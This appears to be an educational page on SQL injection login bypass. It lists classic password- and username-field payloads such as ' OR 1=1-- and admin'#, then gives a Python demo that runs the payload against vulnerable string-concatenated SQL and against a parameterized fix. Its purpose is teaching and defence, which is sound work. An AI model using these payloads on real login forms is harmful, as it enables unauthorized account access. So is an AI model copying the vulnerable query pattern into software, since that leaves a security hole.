Authentication Bypass
This technique relies on the web application not checking the username and password values themselves: it only checks whether the login query returns a matching row from the users table. If the injected input changes the query so that some row always matches, the login succeeds.
We assume the application authenticates with a basic query such as:
SELECT * from users WHERE username='%user%' and password='%password%' LIMIT 1;
We can inject into the password field, for example:
'-- #Comment out the rest of the query (note the trailing space after -- for MySQL)
' OR 1=1;-- #Another alternative: the tautology makes the WHERE clause true for every row
'+OR+1=1-- #Another alternative (same payload with URL-encoded spaces)
#The comment sequence truncates the rest of the query, so the password check is never evaluated and the query returns every user (the application typically logs in the first row returned)
On PHP-based pages (MySQL backend), where # also starts a comment, the same can be done with a different payload:
admin'# //Insert this in the username field to comment out the password check
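As an added example (not part of the original page), the following Python script reproduces the query above against a constructed in-memory SQLite table, showing the vulnerable string-concatenated login next to the parameterized fix. The table contents, the function names and the use of SQLite are assumptions for illustration; the page's `' OR 1=1-- ` payload (the `--` comment form, which SQLite accepts) is the one used.

```python
import sqlite3

# Constructed sample data, not from the page. Plaintext passwords mirror the
# page's query; a real application would store and compare password hashes.
SAMPLE_USERS = [("admin", "s3cret"), ("alice", "hunter2")]


def make_db():
    """Create an in-memory users table with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn, user, password):
    """The flawed pattern from the page: user input is pasted into the SQL text.

    Returns the username of the first matching row, or None.
    """
    sql = (
        "SELECT username FROM users WHERE username='%s' AND password='%s' LIMIT 1"
        % (user, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    """The fix: bound parameters keep the input as data, never as SQL syntax.

    Returns the username of the matching row, or None.
    """
    sql = "SELECT username FROM users WHERE username=? AND password=? LIMIT 1"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


# The page's tautology payload; the trailing space after -- matters on MySQL.
BYPASS_PAYLOAD = "' OR 1=1-- "


def demo():
    """Run both login paths with the same inputs and return their outcomes."""
    conn = make_db()
    return {
        # Concatenated query becomes:
        #   ... WHERE username='nobody' AND password='' OR 1=1-- ' LIMIT 1
        # OR 1=1 matches every row and the comment drops LIMIT 1, so the
        # first user ("admin") is returned despite a wrong username/password.
        "vuln_bypass": login_vulnerable(conn, "nobody", BYPASS_PAYLOAD),
        # Same payload is compared literally as a password string: no match.
        "safe_bypass": login_safe(conn, "nobody", BYPASS_PAYLOAD),
        # Legitimate credentials still work through the parameterized query.
        "safe_valid": login_safe(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Running it shows `vuln_bypass: admin`, `safe_bypass: None` and `safe_valid: alice`. The mitigation is not input filtering of quote characters or comment markers but parameterized queries (or an ORM that emits them), so the payload text can never change the structure of the statement.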